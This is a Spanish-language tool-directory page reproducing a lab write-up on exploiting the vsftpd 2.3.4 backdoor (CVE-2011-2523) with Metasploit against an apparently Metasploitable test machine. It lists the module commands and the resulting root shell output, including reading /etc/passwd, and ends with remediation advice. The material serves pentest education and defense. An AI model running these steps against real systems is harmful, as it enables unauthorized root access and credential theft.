Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
vsftpd-234-vuln-report — Evaluación de vulnerabilidades y explotación de vsftpd 2.3.4 (CVE-2011-2523) mediante Metasploit. Informe completo y prueba de acceso root incluidos. | Kitploit
Herramientas/GitHubGitHub/vedpakhare/vsftpd-234-vuln-report
Frameworks de ExploitsAnálisis de VulnerabilidadesExplotaciónPruebas de PenetraciónAprendizaje y EducaciónDesarrollo de Payloads
GitHubvedpakhare/vsftpd-234-vuln-report

vsftpd-234-vuln-report

Evaluación de vulnerabilidades y explotación de vsftpd 2.3.4 (CVE-2011-2523) mediante Metasploit. Informe completo y prueba de acceso root incluidos.

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir
Ver RepositorioSitio web
2hace 1 añoAún no revisado

💥 Informe de Explotación del Backdoor en vsftpd 2.3.4

Explotación de una vulnerabilidad conocida en vsftpd 2.3.4 usando Metasploit.

📌 Detalles del Objetivo

  • IP del Objetivo: 192.168.150.133
  • Servicio: FTP
  • Versión Vulnerable: vsftpd 2.3.4
  • Módulo de Exploit: exploit/unix/ftp/vsftpd_234_backdoor
  • Payload: Shell de comandos (TCP)

🔍 Resumen de la Vulnerabilidad

vsftpd 2.3.4 contiene un backdoor malicioso que abre un shell de comandos en el puerto 6200 cuando se recibe un nombre de usuario especialmente diseñado (que termina en :)).

CVE: CVE-2011-2523


🚀 Pasos de Explotación

root@kitploit:~
use exploit/unix/ftp/vsftpd_234_backdoor
set RHOSTS 192.168.150.133
run

💥 Acceso al Shell Obtenido:

root@kitploit:~
whoami
> root

id
> uid=0(root) gid=0(root)

hostname
> metasploitable

uname -a
> Linux metasploitable 2.6.24-16-server #1 SMP ...

cat /etc/passwd
> root:x:0:0:root:/root:/bin/bash
  daemon:x:1:1:daemon:/usr/sbin:/bin/sh
  ...

🔐 Impacto

El acceso root al shell otorga al atacante el control total sobre el sistema objetivo — incluyendo escalada de privilegios, movimiento lateral, exfiltración de datos y acceso persistente.


✅ Recomendación

  • NO utilice vsftpd 2.3.4.
  • Actualice a una versión segura y con soporte.
  • Restrinja el acceso externo al FTP.
  • Supervise el tráfico sospechoso en el puerto 6200.

📄 Informe

📝 Informe PDF completo disponible en este repositorio: vsftpd-exploit-report.pdf


📚 Referencias

  • Información del Módulo Rapid7
  • CVE-2011-2523 - NVD

👨‍💻 Autor

Hecho con 🔥 por vedpakhare

Descargar herramienta